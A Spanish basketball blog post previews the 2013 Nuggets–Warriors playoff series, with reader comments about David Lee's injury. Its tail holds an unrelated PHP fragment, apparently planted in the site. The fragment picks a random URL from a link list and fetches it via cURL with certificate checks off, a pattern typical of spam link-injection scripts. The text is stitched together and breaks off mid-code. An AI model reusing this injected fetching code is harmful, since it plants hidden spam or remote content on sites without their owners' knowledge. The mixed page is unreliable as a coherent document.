Previa Denver Nuggets – Golden State Warriors

20 de April de 2013 por Simon

Preciosa eliminatoria la que ha deparado la regular season. Dos de los equipos más atractivos de la competición se enfrentan en esta eliminatoria que, a pesar de la gran temporada que han realizado los pupilos de George Karl, se presenta con un devenir incierto. Ambos equipos plantean un juego entretenido y vistoso que puede hacer de esta la serie más entretenida de esta primera ronda.

Denver ha hecho una gran temporada regular, por momentos imparables, pero su estilo de juego a un ritmo asfixiante y basado en aprovechar cualquier despiste del equipo rival para anotar de forma sencilla y rápida es lo que más dudas plantea una vez llegados los Playoffs, donde los equipos limitan los errores, la intensidad defensiva se multiplica y ellos pueden encontrar menos oportunidades de conseguir puntos gratis.

Por su parte, Golden State Warriors ha cuajado una gran temporada, por momentos luchando incluso por obtener la ventaja de campo, pero un mal mes de febrero les sacó de rueda de los equipos de la zona más alta del Oeste. Golden State también plantea un juego muy alegre, con constantes alternativas y guiado por Stephen Curry, que este año ha demostrado que puede guiar a un equipo puntero al dar un espectacular salto de calidad que le ha llevado a batir el récord de número de triples anotados en una temporada.

Claves de la eliminatoria:

  • Dominio del rebote: Este puede ser un punto vital para el devenir de la eliminatoria. Denver es el segundo equipo mas reboteador de la liga mientras que Golden State es el tercero. Ambos equipos basan gran parte de su juego en la salida rápida de balón tras rebote defensivo por lo tanto el equipo que domine este apartado tendrá ganado mucho.
  • Duelo de banquillos: Los banquillos de ambos equipos se han destapado como importantísimos durante la temporada regular para ambos equipos aunque de manera totalmente diferente. Denver tiene una rotación extensísima en la que todos aportan y prácticamente todos los jugadores pueden ser determinantes si tienen el día. La rotación de los Warriors no es tan extensa pero su rendimiento depende mucho de lo que aporten Jack y Landry desde el banquillo, si alguno falla durante esta eliminatoria las opciones de Warriors se diluirán cual azucarillo.
  • Factor cancha: Otro punto vital de esta eliminatoria. Denver ha cedido sólo tres partidos esta temporada en su pista y ha sido ser el mejor equipo en casa de la NBA. Además llevan 22 victorias consecutivas como local.

Pronóstico: 4-3. Pienso que los Warriors tienen armas de sobra para poner en jaque a Denver Nuggets. Va a ser una eliminatoria espectacular pero el factor cancha pesará mucho pues no veo a Golden State venciendo en el Pepsi Center.

Comenta

5 comentarios a esta entrada

  1. R1Molano dice:
    #1

    Muerto de ganas de que empiece!!!

    Curry nombrado jugador del mes por el Oeste. El primero desde Mullin en 1990

      Citar

  2. rumbero dice:
    #2

    No diga baloncesto, diga Andre Miller. Que maravilla de jugador, que pedazo de partido y que pedazo de canasta para ganarlo. Y con 37 primaveras Muy emocionante el partido. Veremos si lo de Lee es serio porque puede marcar bastante la serie. Mañana comentamos más!

      Citar

  3. MagicJohnson32 dice:
    #3

    Qué mala suerte de David Lee, que en su primera aparición en Playoffs en toda su carrera se lesiona en el Game 1 de primera ronda. ¿Opciones de los Warriors sin él?

      Citar

  4. melo15 dice:
    #4

    Pero ya no juega mas?
    Si es asi 0 opciones para Golden State.

      Citar

  5. Simon dice:
    #5

    Bueno pues una vez confirmado lo de David Lee… la eliminatoria se resolverá mucho más rápido, aunque estoy seguro que GSW no pondrá las cosas fáciles, pero lo que es 7 partidos lo vamos descartando

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>